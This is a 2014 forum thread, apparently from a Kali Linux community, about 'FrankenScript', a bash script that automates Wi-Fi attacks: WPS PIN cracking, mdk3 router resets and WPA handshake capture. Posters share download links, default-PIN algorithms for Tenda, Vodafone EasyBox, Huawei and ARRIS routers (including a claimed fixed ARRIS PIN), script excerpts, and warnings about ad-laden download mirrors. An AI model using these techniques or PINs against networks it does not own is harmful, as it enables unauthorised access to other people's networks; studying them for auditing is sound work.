FrankenScript by Slim76 - It Attacks Access Points and .pcap files

slim76
2014-01-11, 23:00
FrankenScript no longer attacks capture files, but it can capture them.

FrankenScript no longer contains the commands to reset access points.

Notes:
This version doesn't have the WEP attacks set up yet, sorry.
I've added automated attack options.
Internet can be used while performing network attacks; Internet access would be available during the automated attacks only.
FrankenScript works with aircrack-RC3.

FrankenScript For Kali-2.0 (Test Version) Updated 26/11/2015

Download Link:
http://multimirrorupload.com/iopj1184hfee/FS_Kali20.tar.gz

Please leave feedback.

================================================
This download is for Kali-1.X.X

FrankenScript_Portable.3rd.May.2015.tar.gz:
http://www12.zippyshare.com/v/0tnn263D/file.html
================================================

soxrok2212
2014-01-12, 02:12
Wow, this is an amazing script. Would you mind if I posted a link and gave you credits on my post about mdk3?

slim76
2014-01-12, 02:43
Wow, this is an amazing script. Would you mind if I posted a link and gave you credits on my post about mdk3?

Yeah sure mate, it's meant for sharing.
Glad you like it, it's a bit of an ego boost for me as it was my first ever script.
I really didn't know a single thing about scripting and such, I had to trawl the internet and learn everything as I went. LOL
I shouldn't have really posted it yet as it's not finished, I still need to tweak a few things, eg: auto ENTER on some of the options, and I want to change some bash commands.

I'm doing a BTHub3 wordlist at the moment (making slow progress with perl though), so sometime in the future I might upload it or even add it to FrankenScript.

soxrok2212
2014-01-12, 02:53
Yeah. I have a couple of suggestions.

1- Just an issue I found, when I go to enter "Attack Mode", I notice that it closes all processes that may cause a problem, but after that, my card no longer picks up networks. However, if I put into monitor mode manually and don't kill the processes, I have no problems.

2- When using MDK3 to reboot the router, check security type of target network and check for clients. If the target supports WPA-TKIP and has active clients, add -j to mdk3 mon0 m. It should reduce reboot times.

3- Make airodump stop and restart when using mdk3 to reboot the router. As more and more clients are connected with mdk3 mon0 a, airodump has to remember every single one, which causes it to slow down and freeze.

Looks good other than those few things though and great share!

slim76
2014-01-12, 03:20
I'm really not sure about that issue as I've not encountered it myself, the only processes that are killed are:
NetworkManager
wpa_supplicant
The only other thing in the attack mode section is macchanging.

I don't have that issue and I can't get access to another machine for a while so I can't really look into it too well, hopefully someone else might be able to enlighten us.

Cheers for the suggestions.
I haven't looked into mdk3 properly yet, will have to try the attacks myself and see how I can implement them into the script (More headache!! LOL).

Oh I just had a thought, maybe the timing might be out, you could try making the sleep time longer.

soxrok2212
2014-01-12, 03:46
Ok. I'll try it again tomorrow and see what happens!

slim76
2014-01-12, 14:07
If anyone knows of any other WPS default pin generators please could you post them for me.
Many thanks.

flyinghaggis
2014-01-12, 14:54
Just using your script now and it is very impressive.

Just one thing I noticed - when using wash there is no error check for FCS errors so I added the -C switch to the script and all is working fine (Hope there is no copyright infringement ;) )

The other thing, I wasn't aware that it must be run from root - this had me baffled until I realised that is where the dependencies are placed. A nice new folder would be nice to place all the client captures just to tidy it up a bit.

A netgear WPS pin generator would be nice - all I know is that they invariably start with a 2 but hey what do I know.

Rab.

shaberu
2014-01-12, 15:00
If anyone knows of any other WPS default pin generators please could you post them for me.
Many thanks.

I noticed with my wps pin script you're only using the last 6 characters in the MAC address; sometimes you need to use the first 6 instead.

slim76
2014-01-12, 15:24
Just using your script now and it is very impressive.

Just one thing I noticed - when using wash there is no error check for FCS errors so I added the -C switch to the script and all is working fine (Hope there is no copyright infringement ;) )

The other thing, I wasn't aware that it must be run from root - this had me baffled until I realised that is where the dependencies are placed. A nice new folder would be nice to place all the client captures just to tidy it up a bit.

A netgear WPS pin generator would be nice - all I know is that they invariably start with a 2 but hey what do I know.

Rab.

Many thanks for the feedback.
It did originally have the folder you're talking about, but I removed it while cleaning and adding to the script, I'll end up putting it back at some point.

What do you mean by wash and -C switch?.

slim76
2014-01-12, 15:28
I noticed with my wps pin script you're only using the last 6 characters in the MAC address; sometimes you need to use the first 6 instead.

Oh blimey I didn't know that, cheers matey.
Sorry mate I didn't know who wrote the script, hope you don't mind that I added it to FrankenScript?
I'll add credits to the script at some point, would you mind if I included you and your pin generator?

flyinghaggis
2014-01-12, 15:41
What do you mean by wash and -C switch?.

-C, --ignore-fcs Ignore frame checksum errors......

If I don't use this all I get is fcs errors - never used to get as many but with new adapter it seems that is all I get so I use the -C switch and all works as should.

Rab.

Forgot - It is in the wash help

shaberu
2014-01-12, 15:47
I don't mind; if I did I wouldn't try and help lol

slim76
2014-01-12, 18:37
-C, --ignore-fcs Ignore frame checksum errors......

If I don't use this all I get is fcs errors - never used to get as many but with new adapter it seems that is all I get so I use the -C switch and all works as should.

Rab.

Forgot - It is in the wash help

Kool, I'll add it to the script so others with the same issue can benefit.

VinnyG
2014-01-13, 17:26
Wow what nice this FrankSteroids bombed script, wanna try this with my new 2W adapter that is coming ;)

slim76
2014-01-14, 02:46
I've updated FrankenScript and posted the download link on the first page.

mmusket33
2014-01-14, 03:13
We attempted to download your script thru this site. It tells you to go to a mirror. We went to all the mirrors and they are all the same - they want you to download and install a download.exe file onto your computer. We dragged out an old persistent usb driven XP program and ran the download. It quickly filled the computer with tons of spyware and programs. The spyware got stopped by the antivirus and it took us 30 minutes to remove all the bogus programs; they were all over the place to include showing up in notepad. And we never actually got to your program.
We are not happy campers.

Musket Teams Alpha and Bravo

slim76
2014-01-14, 03:18
We attempted to download your script thru this site. It tells you to go to a mirror. We went to all the mirrors and they are all the same - they want you to download and install a download.exe file onto your computer. We dragged out an old persistent usb driven XP program and ran the download. It quickly filled the computer with tons of spyware and programs. The spyware got stopped by the antivirus and it took us 30 minutes to remove all the bogus programs; they were all over the place to include showing up in notepad. And we never actually got to your program.
We are not happy campers.

Musket Teams Alpha and Bravo

Cheers for the heads up mate.
I've checked it out and the downloads are fine, maybe you clicked on the silly ads that they use, avoid the ads and all should be good.

Your reply is kinda strange to me, you're the only person that has mentioned such issue, and what you said just doesn't add up.
I made a post at 02:46 AM saying that I had updated FrankenScript, you replied at 03:13 AM saying that you spent the last half an hour removing viruses.
So you're saying you spent 30mins removing viruses, plus the time it takes to browse to the mirror site and browse and try ALL the mirrors all within 27 minutes. LOL

Update:
I've added several direct links.

mmusket33
2014-01-14, 06:22
Again for clarity this is what we get - !!!Downloaders beware!!!

We are using XP for the download

For example:
We went to: http://rghost.net/51637035

There is a black rectangular square below the file name with the word Download. When you click on the square the program asks you to download FrankenScript-v2.tar.gz.

You click it and it shows you the correct file name and asks to run or save. You save the file !!!BUT!!! What you get is:

FrankenScript-v2.tar.gz-180upload_accelerator.exe(314KB)

We have already seen this on the original download link and do not wish to go through that again, i.e. the same size file, just a more embedded name. Here they stick the actual file name at the beginning but give you an exe file instead.

We picked this page for its simplicity. There are only one or two other download buttons on the far right of the page and they deal with Windows products.

Musket Team A/B

mmusket33
2014-01-14, 06:41
Okay further to our above comments.

Our lab has six computers. We tried two other computers running XP and in every case clicking on the file gave us an exe file. The name of the file changed with the site but in every case it was a small exe. You do not want to run this - see our original above. Next we thought to try the download with kali-linux.

Using kali-linux we downloaded the correct file named FrankenScript-v2.tar.gz.

So for most of these links shown for this file we suggest users not use XP for the download - you will end up with a load of spyware and bogus products.


MTA/MTB

mmusket33
2014-01-14, 06:45
Again for clarity this is what we get - !!!Downloaders beware!!!

We are using XP for the download

For example:
We went to: http://rghost.net/51637035

There is a black rectangular square below the file name with the word Download. When you click on the square the program asks you to download FrankenScript-v2.tar.gz.

You click it and it shows you the correct file name and asks to run or save. You save the file !!!BUT!!! What you get is:

FrankenScript-v2.tar.gz-180upload_accelerator.exe(314KB)

We have already seen this on the original download link and do not wish to go through that again, i.e. the same size file, just a more embedded name. Here they stick the actual file name at the beginning but give you an exe file instead.

We picked this page for its simplicity. There are only one or two other download buttons on the far right of the page and they deal with Windows products.

Musket Team A/B

mmusket33
2014-01-14, 09:53
We figured out what was going on. We have six computers in our lab. After trying two XP downloads we tried it with kali-linux and got the correct file.

We provide the following warning. If you use XP to download posted files from these sites look very closely at the file that is actually loaded onto your computer. Open up your folder where you downloaded it and read the entire file name. Look to see if it is an .exe file. Do not run this file.

Furthermore NEVER Click RUN from any of these sites, load the file and inspect it closely.

For example you might load a file called ABCDEF.tar.gz. When you get the yellow rectangle asking to run or save, the file name will say ABCDEF.tar.gz. BUT when you get the file saved you will get something like ABCDEF.tar.gz.exe. If you run this your antivirus will go nuts AND you will get a ton of useless files asking to check your computer or provide some sort of service. We tested this exe file with a persistent usb version of XP that we were going to trash. We even had icons showing up in notepad.

However if you download the file with kali-linux you get what you asked for, and are not sent to viral land of spyware and products no one wants or will ever need.

We have no knowledge about Windows 7 but we suspect the result would mimic XP

http://mir.cr/
http://www21.zippyshare.com/
http://rghost.net/
http://www.sendmyway.com/
http://fichier.com/
http://180upload.com/
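
The check described in the post above (read the whole saved file name and see whether it is really an .exe), as an added example that is not part of any post in this thread: a POSIX shell function that classifies a saved download by its leading bytes as well as its name. The function names, verdict words and sample file names are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread: judge a download by its content,
# not by the name the browser showed in the save dialog.

# magic_hex FILE -> first four bytes as lowercase hex, e.g. "1f8b0800"
magic_hex() {
    od -An -tx1 -N 4 "$1" | tr -d ' \t\n'
}

# check_download FILE
# Prints one verdict word; returns 0 only for "ok".
#   ok             name ends in .tar.gz/.tgz, gzip magic, archive lists cleanly
#   executable     content starts with "MZ" (Windows PE) or 0x7f "ELF"
#   name-mismatch  saved name does not end in .tar.gz/.tgz (e.g. .tar.gz.exe)
#   not-gzip       archive name, but content is something else (e.g. HTML)
#   corrupt        gzip magic present, but tar cannot list the archive
#   missing        no such regular file
check_download() {
    _file=$1
    _base=${_file##*/}
    [ -f "$_file" ] || { echo "missing"; return 2; }
    _magic=$(magic_hex "$_file")

    # Content first: an executable is an executable whatever it is called.
    case "$_magic" in
        4d5a*|7f454c46) echo "executable"; return 1 ;;
    esac
    # Then the full saved name, including anything after ".tar.gz".
    case "$_base" in
        *.tar.gz|*.tgz) ;;
        *) echo "name-mismatch"; return 1 ;;
    esac
    # gzip streams always begin with the bytes 1f 8b.
    case "$_magic" in
        1f8b*) ;;
        *) echo "not-gzip"; return 1 ;;
    esac
    # List (do not extract) the archive to confirm it is readable.
    if tar -tzf "$_file" >/dev/null 2>&1; then
        echo "ok"; return 0
    fi
    echo "corrupt"; return 1
}

# make_samples DIR: constructed sample files, harmless byte strings only.
make_samples() {
    _dir=$1
    printf 'constructed payload\n' > "$_dir/payload.txt"
    tar -czf "$_dir/sample.tar.gz" -C "$_dir" payload.txt
    cp "$_dir/sample.tar.gz" "$_dir/renamed.tar.gz.exe"          # gzip data, wrong name
    printf 'MZ\220\000' > "$_dir/sample.tar.gz-accelerator.exe"  # PE magic, appended name
    printf 'MZ\220\000' > "$_dir/lying.tar.gz"                   # PE magic, archive name
    printf '<html>download page</html>\n' > "$_dir/page.tar.gz"  # saved web page
    printf '\037\213\010\000garbage' > "$_dir/broken.tar.gz"     # gzip magic, bad body
}

# Demonstration over the constructed samples.
demo_dir=$(mktemp -d)
make_samples "$demo_dir"
for f in "$demo_dir"/*.gz "$demo_dir"/*.exe; do
    printf '%-34s %s\n' "${f##*/}" "$(check_download "$f" || true)"
done
rm -rf "$demo_dir"
```

Only a file that reports `ok` should be unpacked; anything else is deleted rather than opened.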

flyinghaggis
2014-01-14, 10:34
We provide the following warning. If you use XP to download posted files from these sites look very closely at the file that is actually loaded onto your computer. Open up your folder where you downloaded it and read the entire file name.. Look to see if it is an .exe file. Do not run this file.

Furthermore NEVER Click RUN from any of these sites, load the file and inspect it closely.


With all due respect this is a well KNOWN or should be FACT.
Most websites now are cluttered with download buttons which are not associated with the actual file (not all downloads are malware but are equally annoying and the uninitiated do get caught (Once bitten Twice Shy, or should be)). I still get caught sometimes and I have been using the net since 95.

One possibility, as they are hosting the file, is they are paid in some way for each alternative download while some will merely produce a popup with advertising.

The moral of this is "Buyer/downloader beware" (Unsure? Don't Download unless you know how to clean your machine if you make an error).

Rab.

slim76
2014-01-14, 12:22
I've just checked : http://rghost.net/51637035 and don't see a single thing wrong.
I used the direct link and didn't see a single advert or any dodgy download buttons or the other clickable buttons like you mention.

Please stop trying to make it sound like my downloads are dodgy, there's nothing wrong with them.
Stop clicking other links and you won't have any issues, why you would click on any other links beats the **** out of me. LOL

I'm sure other members and the mods can confirm that my downloads are NOT dodgy.

flyinghaggis
2014-01-14, 12:34
Please stop trying to make it sound like my downloads are dodgy, there's nothing wrong with them, I can't be responsible for people that don't know how the internet works.

That was not my intention - Only explaining the intricacies of downloading from certain hosting sites.
Just downloaded your script from within a Kali/Vmware setup and you are correct there are no other clickable buttons, However, in a windows environment with IE there are not as many as I have seen in the past but still present none the less.

This backs up the theory that it is the hosting site and not YOU who are responsible for the misleading buttons.

Rab.

Just downloaded the script from soxroks thread and it is using mediafire - Lo and behold - popup - requesting you download ilivid, most inexperienced users would get caught with this. - Site Dependent?

slim76
2014-01-14, 12:59
That was not my intention - Only explaining the intricacies of downloading from certain hosting sites.
Just downloaded your script from within a Kali/Vmware setup and you are correct there are no other clickable buttons, However, in a windows environment with IE there are not as many as I have seen in the past but still present none the less.

This backs up the theory that it is the hosting site and not YOU who are responsible for the misleading buttons.

Rab.

Just downloaded the script from soxroks thread and it is using mediafire - Lo and behold - popup - requesting you download ilivid, most inexperienced users would get caught with this. - Site Dependent?

Sorry mate, it wasn't aimed at you mate, it was aimed at musket.
Sorry if it came across wrong.

Not sure why he/she would say such things, not sure what the person has against me as I've done nothing to the person. :-(

mmusket33
2014-01-14, 13:15
Musket Teams wish to state there is nothing wrong with the Frankenscript program.

If you click on the download button with XP you will get a very small exe program. Even the name is hidden during the download process and only shows up in the folder you save it to. This leads to viralville.

If you click the !!exact same button!! with kali-linux you get the correct program. This is all we are saying. So if you want this program download using linux do not use XP.

Nowhere in these threads have we stated that your program is bad or a virus. In fact we like your program very much. Please note we are hosting a program on one of these sites and it has the same problem. You will find I have posted the same warning there.

VinnyG
2014-01-14, 13:29
windows 8.1 it's all fine downloading, plz stop the **** hurt ;)

slim76
2014-01-14, 14:32
Musket Teams wish to state there is nothing wrong with the Frankenscript program.

If you click on the download button with XP you will get a very small exe program. Even the name is hidden during the download process and only shows up in the folder you save it to. This leads to viralville.

If you click the !!exact same button!! with kali-linux you get the correct program. This is all we are saying. So if you want this program download using linux do not use XP.

Nowhere in these threads have we stated that your program is bad or a virus. In fact we like your program very much. Please note we are hosting a program on one of these sites and it has the same problem. You will find I have posted the same warning there.

Yeah but you posted there after you posted here saying that you posted it there too (Check the time stamp). LOL
I'm kool now musket has made things more clear. :-)
Hope there's no bad feelings.

I've already downloaded your script but haven't had chance to try it yet, I'll test it later, cheers for the heads up though.

kcdtv
2014-01-14, 19:17
Very nice job indeed
Some parts of the code are very, very familiar to me. ;)

slim76
2014-01-14, 22:32
Very nice job indeed
Some parts of the code are very, very familiar to me. ;)

What part? Let me guess, it's either the vodafone or the WPSPIN, am I correct?
Please let me know and I'll add credits for you or remove it, whichever you choose I'm kool.

kcdtv
2014-01-16, 18:13
It is WPSPIN you are correct ;)
Please, do not worry and do not delete anything, you are welcome to use the code.
I am not very fluent in english and maybe I sounded sarcastic, that was not the case.
Actually you gave me credit ;)

And a big thanks to the creators of the other two wps default pin generators.

I sincerely appreciate

For information,
- The person that revealed the algorithm of easybox arcadyan Vodafone is Stefan Viehböck: Vodafone EasyBox Default WPS PIN Algorithm Weakness (https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130805-0_Vodafone_EasyBox_Default_WPS_PIN_Vulnerability_v10.txt)
- And one of the algorithms used in WPSPIN (the one that is mostly used among manufacturers, which is a conversion from hexadecimal to decimal of half end bssid) was previously discovered by zhao chunsheng in a script called computepinC83A35 for Tenda router (with beginning bssid C8:3A:35:XX:XX:XX) published in something like May 2012
I thought I found it in something like October-November 2012 but I realized that it was found long before as you can see in the homepage of the script: http://gjkiss.info/2012/04/get-the-pin-in-router-mac-address-start-with-c83a35-00b00c-081075
It is the one that is used in the python script included in your script, WPSpin.py.
The one that I found out is for HUAWEI HG532c and uses part of the essid and some addition before conversion to decimal and is integrated in the function that attributes the PIN that you use in your script.

Keep on the good job and feel free to use WPSPIN, that is what GPL v3 is for.

Cheers :)

shaberu
2014-01-16, 18:44
It is WPSPIN you are correct ;)
Please, do not worry and do not delete anything, you are welcome to use the code.
I am not very fluent in english and maybe I sounded sarcastic, that was not the case.
Actually you gave me credit ;)

lol if I'm not the first person to find this then I don't want any credit I do not deserve.

also if anyone cares as i posted on the Hack forums I have found that any ARRIS router that i test on with the first 6 digits of its mac address 00:1D:CF uses the same pin number of 12345670 it is safe to assume any router that is named suddenlink.net-XXXX uses this pin.

kcdtv
2014-01-16, 19:07
also if anyone cares as i posted on the Hack forums I have found that any ARRIS router that i test on with the first 6 digits of its mac address 00:1D:CF uses the same pin number of 12345670 it is safe to assume any router that is named suddenlink.net-XXXX uses this pin.

I do
That is really interesting, thank you very much for sharing it. :)
Could you give us the exact model of the router?
I guess the WPS is enabled. Could you confirm it?
Is there any AP rate limit system?


lol if I'm not the first person to find this then I don't want any credit I do not deserve.


i guess no one here wants credits for things discovered by other people :)


Smile while you can for in the future there may be nothing to smile about

For sure! :D :D

bond benz
2014-01-16, 20:25
Thank you , i hope be a nice tool :)

shaberu
2014-01-16, 20:28
I do
That is really interesting, thank you very much for sharing it. :)
Could you give us the exact model of the router?
I guess the WPS is enabled. Could you confirm it?
Is there any AP rate limit system?

I really don't know if there is limiting since it's cracked on the first pin.
but the wps is actually forced enabled and locked on this one.
and here is a screen capture of the HW/FW Versions serial marked out because default password

slim76
2014-01-17, 00:01
I like the fact that you guys are modest, it's a rare thing nowadays.
Believe me you all deserve credit regardless, I really appreciate your work and efforts, I couldn't have done what I did if it wasn't for you guys. :-)

Cheers again guys.

VinnyG
2014-01-17, 01:20
I found the pin of a Tenda router right now with WPSPIN & ur script

the other easybox script is for what routers??

Thanks.

kcdtv
2014-01-17, 10:04
Coooool :cool:
Thank you so much Shaberu !!!! ;)



the other easybox script is for what routers??

The source algorithm is patented by arcadyan technologies Key recognition method and wireless communication system (http://www.patentgenius.com/patent/7894379.html)
And was disclosed by stefan wotan and gives the default WPA of easy box vodafone germany and spain > http://www.wotan.cc/?p=6
For the PIN, which is a variation on the pattern patented, it has been reported on German easybox (ISP Vodafone) by Stefan Viehböck https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130805-0_Vodafone_EasyBox_Default_WPS_PIN_Vulnerability_v10.txt
It has also been reported later to be in use in Spanish Vodafone routers http://lampiweb.com/foro/index.php/topic,11902.0.html. Some bugs of the stefan code were corrected by Coeman76 (some zero-padding missing and the need to convert 0 in 1 for the WPA key, at least on Spanish Vodafone access points, which may not be correct on other ones) and he unified the two algorithms (default WPA and default PIN) in one tool.

slim76
2014-01-17, 12:29
The source algorithm is patented by arcadyan technologies Key recognition method and wireless communication system (http://www.patentgenius.com/patent/7894379.html)
And was disclosed by stefan wotan and gives the default WPA of easy box vodafone germany and spain > http://www.wotan.cc/?p=6
For the PIN, which is a variation on the pattern patented, it has been reported on German easybox (ISP Vodafone) by Stefan Viehböck https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130805-0_Vodafone_EasyBox_Default_WPS_PIN_Vulnerability_v10.txt
It has also been reported later to be in use in Spanish Vodafone routers http://lampiweb.com/foro/index.php/topic,11902.0.html. Some bugs of the stefan code were corrected by Coeman76 (some zero-padding missing and the need to convert 0 in 1 for the WPA key, at least on Spanish Vodafone access points, which may not be correct on other ones) and he unified the two algorithms (default WPA and default PIN) in one tool.

So has easy_box been fully implemented into WPSPIN? If it has I'll remove easy_box from FrankenScript.

brazen
2014-01-17, 21:31
'Scan for possible targets.
Once you've identified a target press Ctrl-C to exit the scan and to continue.
Press [Enter] to start the scan.
(i pressed enter)

Please choose an AP
(nothing but blank space)


Please input the number of your chosen target:'

Where are the choices of an AP supposed to appear?

flyinghaggis
2014-01-17, 22:37
The script has to be run from root

copy the script into the root folder and run it from there - it should work....

Rab.

slim76
2014-01-17, 22:46
'Scan for possible targets.
Once you've identified a target press Ctrl-C to exit the scan and to continue.
Press [Enter] to start the scan.
(i pressed enter)

Please choose an AP
(nothing but blank space)


Please input the number of your chosen target:'

Where are the choices of an AP supposed to appear?

The choices should appear just above "Please input the number of your chosen target".
Try what flyinghaggis suggested, if that doesn't work look in the FrankenScript temp folder and delete anything that might be in there.
Did wash display any access points?
Did you select your WiFi device?
Did you enable attack mode?
Did you receive any error messages?

slim76
2014-01-18, 01:48
Update:
FrankenScript-v3 has been added to the first page.

brazen
2014-01-18, 05:02
slim... i have never seen a file so difficult to download. I have clicked every link except for the correct link. I am not sure how to download this file.

shaberu
2014-01-18, 05:45
slim... i have never seen a file so difficult to download. I have clicked every link except for the correct link. I am not sure how to download this file.

http://www63.zippyshare.com/d/67860325/7965/FrankenScript-v3.tar.gz

flyinghaggis
2014-01-18, 08:56
http://www63.zippyshare.com/d/67860325/7965/FrankenScript-v3.tar.gz

This one is downloaded by clicking on the bright orange button at the top right if you hover over it
you will see in the bottom left of your screen a description of the file you are downloading.

I downloaded this from a Kali guest in VMWare using iceweasel.

The other buttons are misleading Yes but that's the nature of the game.

Other browsers may display the download differently but I doubt it (Just hover over it to check the description).

Rab.

slim76
2014-01-18, 10:10
slim... i have never seen a file so difficult to download. I have clicked every link except for the correct link. I am not sure how to download this file.

There's not much I can do about the ads, they're generated by the hosting sites and NOT me.
Honestly mate it's really not that hard, you just need to read things rather than quickly rush through them.
I've added a brief how to download guide to the first page.

If anyone has any suggestions on how I can provide the file without using hosting sites that support ads please let me know.

zimmaro
2014-01-18, 10:51
There's not much I can do about the ads, they're generated by the hosting sites and NOT me.
Honestly mate it's really not that hard, you just need to read things rather than quickly rush through them.
I've added a brief how to download guide to the first page.

If anyone has any suggestions on how I can provide the file without using hosting sites that support ads please let me know.

hi :) slim76
thanks for sharing your work!!! great
i'm not expert ...but...you can try dropbox
bye && thanks again
:D

flyinghaggis
2014-01-18, 12:00
I am having problems with the new version of the script
after selecting option 3 from the menu I press enter - the wash screen pops up for a split second and then closes
with nothing to select on the main page.

I have re-run version 2 from the exact same location (root) and that runs as it should.

Any ideas.

Rab.

I think I may have found the problem

It may be due to the kill process, if I don't run it from your script it runs fine but if I do run it I get nothing.
After running it with the kill process I did an iwconfig after closing the programme and this is the output....
Interface Chipset Driver

wlan0 Realtek RTL8187L rtl8187 - [phy3]SIOCSIFFLAGS: Operation not possible due to RF-kill

(monitor mode enabled on mon0)

But I was still unable to run any operations using my adapter until reboot.
A small bug perhaps.

Rab

brazen
2014-01-18, 13:18
Slim... We all know it's not you... Breathe! LoL
Upload to 0bin.net (that's a zero and then bin.net) great for all kinds of uses as it's an encrypted pastebin
Or use Dropbox if you want.

You assembled a great script and we all want to access it.

slim76
2014-01-18, 13:24
@ zimmaro

Cheers for the suggestion mate, will look into it.

@ brazen

Cheers for the suggestion, will look into it too.
Sorry it sounded like I was moaning/bitching at you, I wasn't, It's just how I talk/type. LOL

@ flyinghaggis

I'll run through the obvious first:
1) Did you select your WiFi device?.
2) Is your WiFi device listed under the main menu screen (Chosen Interface: wlan0)?.
3) Did you enable attack mode?.
4) Is attack mode listed under the main menu screen (System Mode: Attack Mode Enabled)?.
5) Does mon0 have a MAC address listed under the main menu screen (MAC address for mon0)?.
6) Is the temp folder in the FrankenScript directory empty?.

Other possible causes could be:
Sleep timing might need to be increased.
It's possible that you might have double tapped the keyboard button, or held it down too long.

If more people report issues I'll have to think about changing the WiFi device detection, maybe the sleep timing, and maybe change the auto ENTER option to manual too.

FrankenScript-v3.1
UPDATED: 1/18/2014

MDK3 - access point reset files are now deleted.
Changed and added sleep timing.
Changed WiFi device detection again.

PasteBin:
http://goo.gl/PzaT5t

kcdtv
2014-01-19, 00:31
So has easy_box been fully implemented into WPSPIN? If it has I'll remove easy_box from FrankenScript.

No it isn't implemented yet in WPSPIN so you shouldn't remove easy_box but should correct this bug of a missing zero padding somewhere.

cheers and may the force be with you and frankenscript.sh. ;)

slim76
2014-01-19, 06:25
No it isn't implemented yet in WPSPIN so you shouldn't remove easy_box but should correct this bug of a missing zero padding somewhere.

cheers and may the force be with you and frankenscript.sh. ;)

LOL, cheers dude.

I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.

shaberu
2014-01-23, 21:46
NOTE:
If anyone knows of any other WPS default pin generators please could you post them for me.
Many thanks.

http://packetstormsecurity.com/files/123631/ARRIS-DG860A-WPS-PIN-Generator.html

slim76
2014-01-23, 22:58
http://packetstormsecurity.com/files/123631/ARRIS-DG860A-WPS-PIN-Generator.html

Cheers matey, most grateful. :-)

Do you know how to use it, does it use the standard mac of the AP (Openly broadcast)?, or does it use some other mac (Not broadcast)?.
Cheers mate.

mmusket33
2014-01-24, 01:51
We tried to get your download as a download file from your sites. We spent an hour and never got the file. We went to the pastebin site and captured the text for Version3.1. When we ran the program we got an error at line 105 and an error at line 1552. We captured the file three (3) times and ran it and got the same error. We cannot capture the error as the screen constantly blinks and is refreshed. Line 105 is an illegal operation -s and line 1552 says read arg count

slim76
2014-01-26, 23:32
We tried to get your download as a download file from your sites.We spent an hour and never got the file. We went to the pastbin site and captured the text for Version3.1 When we ran the program we got an error at line 105 and an error at line 1552. We captured the file three(3) times and ran it and got the same error. We cannot capture the error as the screen constrantly blinks and is refreshed. Line 105 is an illegal operation -s and line 1552 says read arg count

Sorry to hear you're having trouble with it. Did you change anything in the script? Or maybe you got some sort of corruption while downloading or copying and pasting.

I'll be updating it again soon, I've made a few changes and added some new things.

shaberu
2014-01-28, 05:07
Cheers matey, most grateful. :-)

Do you know how to use it? Does it use the standard mac of the AP (openly broadcast), or does it use some other mac (not broadcast)?
Cheers mate.

Sorry, I have no idea :p just found it while searching around.
I also finally got around to testing your version 1.3 of frankenscript. I really like it; it cracked a wps enabled router, but I do have one problem 201: when scanning for networks to collect a handshake, your script doesn't display the full name of the router. As you can see from my screenshot, this could be a problem; the suddenlink routers have some code that follows its name.

slim76
2014-01-28, 12:54
Sorry, I have no idea :p just found it while searching around.
I also finally got around to testing your version 1.3 of frankenscript. I really like it; it cracked a wps enabled router, but I do have one problem 201: when scanning for networks to collect a handshake, your script doesn't display the full name of the router. As you can see from my screenshot, this could be a problem; the suddenlink routers have some code that follows its name.

Sorry matey, I'll look into it and see if I can fix it for the next update.
Does it contain any symbols or does it just consist of characters and digits? Can you post an example (full broadcast essid) please?

Try this:

Look in FrankenScript for the following lines:
----------------------------------------------------------------------
###### [4] Capture WPA/WPA2 Handshake ######
4)
cd $HOME/FrankenScript/temp
clear
echo $RED"Scan for possible targets."
echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
read -p $GREEN"Press [Enter] to start the scan.$STAND"

xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0

tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length: 0>/d' > temp0.txt
cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
sleep 1

PresentedAPs=$(cat PresentedAPs.txt)

Change this line:
---------------------------
cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt

Replace it with this line:
--------------------------------------
cat temp0.txt | awk '{ print $11 }' | nl -ba -w 1 -s ': ' > PresentedAPs.txt

shaberu
2014-01-28, 19:17
I tried your fix; it didn't help, but here is a screenshot of the networks 202

slim76
2014-01-29, 06:40
I tried your fix; it didn't help, but here is a screenshot of the networks 202

I can't see any reason why it's doing what you say.
The only thing I can think of is that the broadcast essid might have spaces in its name, I used the awk command to print columns so anything with a space would be a different column and wouldn't be printed on the screen.

shaberu
2014-01-29, 09:35
They don't have any spaces. I believe it's caused by the period in their names because that's where it cuts off.

slim76
2014-01-29, 22:51
They don't have any spaces. I believe it's caused by the period in their names because that's where it cuts off.

It's strange 'cause you've tried two different commands.
One command grepped for the last column, the other command deleted everything up to the beginning of the essid (so the essid and everything after should have been printed).
I'm still updating FrankenScript, it would have been done already if I hadn't deleted stuff that I shouldn't have. :-(

kcdtv
2014-01-29, 22:58
LOL, cheers dude.

I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.

I made an update of wpspin and I implemented the algorithm corrected in bash in a function called arcadyan

I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
You "feed it" with $BSSID which is the mac address of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING which are the 7 numbers of the PIN
then it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )


ARCADYAN(){
# WPSPIN 1.5 - GPL v 3 by kcdtv
# This function uses three amazing works
# 1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc
# 2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
